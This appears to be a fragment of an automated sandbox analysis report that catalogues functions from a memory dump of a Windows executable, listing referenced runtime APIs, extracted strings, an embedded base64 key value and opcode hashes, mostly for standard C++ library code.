_Mtx_unlock.LIBCPMT ref: 013DDBB1

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Init_thread_footerMtx_unlockRegister
String ID:
API String ID: 2319529737-0
Opcode ID: 87d064a44f525c52c7441c215877bb566df6c4efe8e3fa348c21ee7e650f995e
Instruction ID: 6de0b8e6b3c0f0bc233c52a2d656d0c5e298c050490a53024ff26cc222353328
Opcode Fuzzy Hash: 87d064a44f525c52c7441c215877bb566df6c4efe8e3fa348c21ee7e650f995e
Instruction Fuzzy Hash: 68515D32214B4181EF15DF6AF8803A97361F7A8B98F58422ADB5D477B8DF38C485C700

Uniqueness

Uniqueness Score: -1.00%

Function 013DD780, Relevance: 12.2, APIs: 8, Instructions: 154COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013DD7AD
std::_Lockit::_Lockit.LIBCPMT ref: 013DD7D2
std::_Lockit::~_Lockit.LIBCPMT ref: 013DD7FD
std::_Facet_Register.LIBCPMT ref: 013DD875
std::_Lockit::~_Lockit.LIBCPMT ref: 013DD898
Concurrency::cancel_current_task.LIBCPMT ref: 013DD8C2
_Init_thread_footer.LIBCMT ref: 013DD934
_Mtx_unlock.LIBCPMT ref: 013DD981

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Init_thread_footerMtx_unlockRegister
String ID:
API String ID: 2319529737-0
Opcode ID: 4518706d84728416f07820a588aa3a071adfe516c785c13b8a9c2f4fed8dc245
Instruction ID: 42cea788e4874b1ad522e0ecdcfaf154547fbc76e214a63a446c978045f73ee8
Opcode Fuzzy Hash: 4518706d84728416f07820a588aa3a071adfe516c785c13b8a9c2f4fed8dc245
Instruction Fuzzy Hash: AC517032214B4181DF25DF6AF8803A97761F7A8B94F58562ADA9E477B8DF38C485C700

Uniqueness

Uniqueness Score: -1.00%

Function 01462DE4, Relevance: 10.8, APIs: 7, Instructions: 291COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0146321A

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b834c4ce469cd4cf528eea862cf8904087cdb7fea861587577a1c15781da9227
Instruction ID: d54f0a8ff0b4fb343271885c03c42c8187961c34676e65e3517a2e1ba7352135
Opcode Fuzzy Hash: b834c4ce469cd4cf528eea862cf8904087cdb7fea861587577a1c15781da9227
Instruction Fuzzy Hash: A9B102722147C691DB619F6A94407AE7B68F3A1BD8F450207EE8E07775CFB9C45AC302

Uniqueness

Uniqueness Score: -1.00%

Function 013DE5E0, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 276COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 013DE781
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE78D
Concurrency::cancel_current_task.LIBCPMT ref: 013DE953

Part of subcall function 013B1AF0: __std_exception_copy.LIBVCRUNTIME ref: 013B1B38

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013DE959

Strings

0@@, xrefs: 013DE996
MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH, xrefs: 013DE7A5

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn$__std_exception_copy
String ID: 0@@$MIICIDANBgkqhkiG9w0BAQEFAAOCAg0AMIICCAKCAgEAw/e1WN2RDlZ/9md10KzUpWlxrT4OZ5i86V8WSvEe6oBeJzctIk5HSO6ZxifUG2DZSCxjLLVldfB4na99WsCKe/5Ut0ZEGReLaHfzTXPAaluABfbBnwXGIBopPBcKgdfLQLps0/k7njlzYdlYmr617c5d6GRZ0eWBKDXl2bzYX2iNPwDB660gA/UlZxXHHZwWT69HbeIqH+oGrPj3BOTJo5kH
API String ID: 588606609-1774978856
Opcode ID: efea99735488f04df118d16f87a3e5b100845d46694a15421e1f05de444d9f1a
Instruction ID: f47230f229277037d34a714f7bb413527e531159545a64823e4fa3000b2fdb81
Opcode Fuzzy Hash: efea99735488f04df118d16f87a3e5b100845d46694a15421e1f05de444d9f1a
Instruction Fuzzy Hash: 1C91DE26310A8495DE14DF26F5442AE6B65F758BE8F980726DFAE0BBA4DF38C091C300

Uniqueness

Uniqueness Score: -1.00%

Function 013B2550, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013B25BE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013B2606
std::_Lockit::~_Lockit.LIBCPMT ref: 013B26EB

Strings

bad locale name, xrefs: 013B270D
p$@, xrefs: 013B261E
0#@, xrefs: 013B2614

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: 0#@$bad locale name$p$@
API String ID: 2775327233-2741200729
Opcode ID: b455f40b19eeb2e837f821b75753a5e68b62514b1cdf95d55052569b55254fd7
Instruction ID: d8cead6370681c77fc807aa6bb02db18d77c107d5306a568982d12bfb243a5f0
Opcode Fuzzy Hash: b455f40b19eeb2e837f821b75753a5e68b62514b1cdf95d55052569b55254fd7
Instruction Fuzzy Hash: D4716B32701B808AEB10DFB5E4907AE3765FB64B98F04462ADF4967A29EF34D166C344

Uniqueness

Uniqueness Score: -1.00%

Function 013DEE50, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013DEEBE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013DEF06
std::_Lockit::~_Lockit.LIBCPMT ref: 013DEFC3

Strings

bad locale name, xrefs: 013DEFE5
p$@, xrefs: 013DEF1E
0#@, xrefs: 013DEF14

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: 0#@$bad locale name$p$@
API String ID: 2775327233-2741200729
Opcode ID: b99ccf86deaad46ca7a67355a6f441fd18114c88ab273a508ba5aac250af5d50
Instruction ID: 799d463371c9085bd0a15bb6aefd42fa74025effbfc137723c9d1b3691e3c6c6
Opcode Fuzzy Hash: b99ccf86deaad46ca7a67355a6f441fd18114c88ab273a508ba5aac250af5d50
Instruction Fuzzy Hash: 39411933302B409AEB15DFB5E4907AC3768EB64748F08453ADF496BA68DF34C52AD358

Uniqueness

Uniqueness Score: -1.00%

Function 013DECB0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 117COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013DED1E
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013DED66
std::_Lockit::~_Lockit.LIBCPMT ref: 013DEE19

Strings

bad locale name, xrefs: 013DEE3B
p$@, xrefs: 013DED7E
0#@, xrefs: 013DED74

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: 0#@$bad locale name$p$@
API String ID: 2775327233-2741200729
Opcode ID: 0c29abda9bdee0e88fb9fb88b089425dcdd7fb0ba67462e74ac2f135ac9a56a7
Instruction ID: a84a5c77287994d85b50ad1a01e7450ab09f5bbf3e5f8a0b9399f38ba2a8fde2
Opcode Fuzzy Hash: 0c29abda9bdee0e88fb9fb88b089425dcdd7fb0ba67462e74ac2f135ac9a56a7
Instruction Fuzzy Hash: 6B412933302A40CAEB15DFB5E4907AC3764EB64748F08453ADF496BA68DF34C56AC358

Uniqueness

Uniqueness Score: -1.00%

Function 01446460, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 01446517

Strings

,<ellipsis>, xrefs: 014464F4
<ellipsis>, xrefs: 01446570
,..., xrefs: 014464E4
..., xrefs: 01446560
void, xrefs: 01446595

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 2943138195-2211150622
Opcode ID: c3240f696783fc590027323945ddf384301e5db515a9b6306716d124efb14915
Instruction ID: c0901f30b5339f5972a542052955405d792b7fa16837ac361b5d291551bcd4a2
Opcode Fuzzy Hash: c3240f696783fc590027323945ddf384301e5db515a9b6306716d124efb14915
Instruction Fuzzy Hash: F54137B2A04B448AFB028F68E8803ED7BB0F70A748F594116CB8957738DB788595C790

Uniqueness

Uniqueness Score: -1.00%

Function 01448050, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 80COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 0144812D

Strings

short , xrefs: 014480BA
unsigned , xrefs: 01448101
char , xrefs: 014480C3
int , xrefs: 014480AB
long , xrefs: 0144809C

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: 7b3e1474446843f7f4b1925789a704fb8f5446beea646d326e2d92cbf41ef3db
Instruction ID: f3844c00e7a01ab0a9bddc9783bab3265a8c5dfd8e64c047af921d44626e07a0
Opcode Fuzzy Hash: 7b3e1474446843f7f4b1925789a704fb8f5446beea646d326e2d92cbf41ef3db
Instruction Fuzzy Hash: 7D316AB2A20B568AFB118FA8E8503ED37B1B319B48F844017CB8957739DB78C186C754

Uniqueness

Uniqueness Score: -1.00%

Function 0146E90C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0146E93D
GetLastError.KERNEL32 ref: 0146E949
CloseHandle.KERNEL32 ref: 0146E961
CreateFileW.KERNEL32 ref: 0146E98C
WriteConsoleW.KERNEL32 ref: 0146E9AB

Strings

CONOUT$, xrefs: 0146E96D

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: bb58081a1d6e9c860531801b85bbac20a5b94f1fddc5b87511302c3c5b41588c
Instruction ID: d389822d0dc065ef656c90a62a37789804a5d66575a112722d0a22927b342a17
Opcode Fuzzy Hash: bb58081a1d6e9c860531801b85bbac20a5b94f1fddc5b87511302c3c5b41588c
Instruction Fuzzy Hash: 74116A31724B8086E7508B96F84875AA3A4FB88BE8F444225EA5E977B4DF78C418C740

Uniqueness

Uniqueness Score: -1.00%

Function 01463D78, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 386COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 01463E49
_invalid_parameter_noinfo.LIBCMT ref: 0146428A

Strings

UTF-16LEUNICODE, xrefs: 0146422E
UTF-8, xrefs: 0146420D
ccs, xrefs: 014641D6

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 0323750f7ab22453cf12b331c9cfb881ec234ea8d3c7a27f5774bcec0a772c40
Instruction ID: cf3aace27208dd563c6b56d696c0892a9d9b1f0be652c2e5d1752e05079ab5f9
Opcode Fuzzy Hash: 0323750f7ab22453cf12b331c9cfb881ec234ea8d3c7a27f5774bcec0a772c40
Instruction Fuzzy Hash: B9D1CC72604280D6EF2A9F2DD6943BA2BA9F762B9CF19541BCB4A57335D739C442C303

Uniqueness

Uniqueness Score: -1.00%

Function 013DC410, Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013DC43D
std::_Lockit::_Lockit.LIBCPMT ref: 013DC462
std::_Lockit::~_Lockit.LIBCPMT ref: 013DC48D
std::_Facet_Register.LIBCPMT ref: 013DC505
std::_Lockit::~_Lockit.LIBCPMT ref: 013DC528
Concurrency::cancel_current_task.LIBCPMT ref: 013DC552

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 59347e0bd8456f7d42151e999976a1ee9ceb9de2b7a70a9267c0371d9367dc5e
Instruction ID: f9f7214cd842fe325d2cbbef019fb4d2d52c2ba777dca59cdda7769257912696
Opcode Fuzzy Hash: 59347e0bd8456f7d42151e999976a1ee9ceb9de2b7a70a9267c0371d9367dc5e
Instruction Fuzzy Hash: 4B314D32224B4081DF26DF1AF45036AB761F798FA8F58162ADA9E47B79DF38C546C700

Uniqueness

Uniqueness Score: -1.00%

Function 013DE490, Relevance: 9.1, APIs: 6, Instructions: 91COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013DE4BD
std::_Lockit::_Lockit.LIBCPMT ref: 013DE4E2
std::_Lockit::~_Lockit.LIBCPMT ref: 013DE50D
std::_Facet_Register.LIBCPMT ref: 013DE585
std::_Lockit::~_Lockit.LIBCPMT ref: 013DE5A8
Concurrency::cancel_current_task.LIBCPMT ref: 013DE5D2

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 858c43560a5a4a669eded988c7f61d0222c6bccd34f109beb23dc39ebc275d7b
Instruction ID: a3b16bb3b642a4d7dec94ecc3c2b6ef6d5e1d67cdcb64a87f0f21228df909b44
Opcode Fuzzy Hash: 858c43560a5a4a669eded988c7f61d0222c6bccd34f109beb23dc39ebc275d7b
Instruction Fuzzy Hash: DA311A36214B4081DB25DF1AF48039A7B61F798FE8F581626EA9E4B778EF38D195C700

Uniqueness

Uniqueness Score: -1.00%

Function 01465DF8, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 194COMMON

Download Yara Rule

APIs

Part of subcall function 0146580C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,01465B30,?,?,?,?,00000000,COMSPEC,?,01465DCE), ref: 01465836

IsValidCodePage.KERNEL32(?,00000001,?,?,00000000,00000001,?,01465BE3,?,?,?,?,00000000,COMSPEC,?,01465DCE), ref: 01465E63
GetCPInfo.KERNEL32(?,00000001,?,?,00000000,00000001,?,01465BE3,?,?,?,?,00000000,COMSPEC,?,01465DCE), ref: 01465EAF

Strings

xrM, xrefs: 01465F55, 0146603C
XvM, xrefs: 01465F5E, 01466045
hrM, xrefs: 01465F67, 0146604E

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: XvM$hrM$xrM
API String ID: 546120528-1045095878
Opcode ID: 4c89efc71a8450257703fc3b98bf4da13d4ab65f52216cbd6908792beb83925c
Instruction ID: 27063d462779ddd12c33c1920782395fddc0a0c0da5427e68f5329ddbb1039b9
Opcode Fuzzy Hash: 4c89efc71a8450257703fc3b98bf4da13d4ab65f52216cbd6908792beb83925c
Instruction Fuzzy Hash: 4B7105B770468086EB39CF29E46036B7B6AE344BC8F494127DB9A4B771DB39D545C302

Uniqueness

Uniqueness Score: -1.00%

Function 01449534, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 01449614

Part of subcall function 014469C4: DName::operator+.LIBVCRUNTIME ref: 01446E71
Part of subcall function 014469C4: DName::operator+.LIBVCRUNTIME ref: 01446EA9

Strings

std::nullptr_t, xrefs: 014496EA
volatile, xrefs: 014495A6, 01449739
volatile , xrefs: 01449597, 0144972A
std::nullptr_t , xrefs: 014496BE

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: 134942591645136b297f841ee68fbdcecd929cb0680baba0e630731556d4322f
Instruction ID: 12cb42508f16bd0a3096c77a332e6a0a51ce8a56acf6c19d543777f2de7e23b4
Opcode Fuzzy Hash: 134942591645136b297f841ee68fbdcecd929cb0680baba0e630731556d4322f
Instruction Fuzzy Hash: FC5172B2604B408AFB14DF69E8543AE77B5F719788F98452BCB4917B38DB39C265C380

Uniqueness

Uniqueness Score: -1.00%

Function 013E3A10, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 013E3B51

Strings

p;C, xrefs: 013E3A37
PO@, xrefs: 013E3AF4
X;C, xrefs: 013E3B93
d;C, xrefs: 013E3A2C

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: PO@$X;C$d;C$p;C
API String ID: 3668304517-2252460308
Opcode ID: 1120f77bce1652d52ed95505be3f9662e0a494fdcfaa2b52d8abba59bcd134ec
Instruction ID: 003f3184101e97833a5a171bcf196c86a1c8285157601d63d2575204569288da
Opcode Fuzzy Hash: 1120f77bce1652d52ed95505be3f9662e0a494fdcfaa2b52d8abba59bcd134ec
Instruction Fuzzy Hash: 22310472711B9495EF09CF2AE5983A933A6F745B88F988125CE8D0B7A8DF79C485C300

Uniqueness

Uniqueness Score: -1.00%

Function 0144B000, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 0144B0E1

Strings

`template-parameter, xrefs: 0144B0EF
void, xrefs: 0144B046

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameName::
String ID: `template-parameter$void
API String ID: 1333004437-4057429177
Opcode ID: e06e843c225df2024afe861d4cdf36a1cb04665ed4343be19d8057563c689266
Instruction ID: 2646bfc23db89ba752ad19888a0c4a34d4737ede35a76451608c3d503aa3ab8e
Opcode Fuzzy Hash: e06e843c225df2024afe861d4cdf36a1cb04665ed4343be19d8057563c689266
Instruction Fuzzy Hash: C0414C62B10B548AFB11DBA5D8503ED37B1F758798F95402ACE4D2BB68DF78C145C740

Uniqueness

Uniqueness Score: -1.00%

Function 0145E610, Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0145E651
GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,0145E5CF,?,?,FFFFFFFE,0145BDB2), ref: 0145E710
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,0145E5CF,?,?,FFFFFFFE,0145BDB2), ref: 0145E790

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 5e750b990de8c5b0c9f3323242ed87a15d18927bf0b7d61d40c9da449a3dad85
Instruction ID: 6cb35eda8be1b4a01eccb2f4d4d78b7f967248cfe71852881351629e120354d5
Opcode Fuzzy Hash: 5e750b990de8c5b0c9f3323242ed87a15d18927bf0b7d61d40c9da449a3dad85
Instruction Fuzzy Hash: A271123271065199EB91DFAAD8807AEAB64F758B98F84011BDF0A63776DF34C246C320

Uniqueness

Uniqueness Score: -1.00%

Function 01447CD8, Relevance: 7.6, APIs: 5, Instructions: 94COMMON

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 01447D51
DName::operator+.LIBVCRUNTIME ref: 01447D73
DName::DName.LIBVCRUNTIME ref: 01447D86
DName::DName.LIBVCRUNTIME ref: 01447DBD
DName::DName.LIBVCRUNTIME ref: 01447DC8

Memory Dump Source

Source File: 00000000.00000002.657238994.00000000013B1000.00000020.00020000.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.657234895.00000000013B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657343156.000000000147D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657376976.00000000014D1000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.657383924.00000000014DD000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657389852.00000000014E8000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
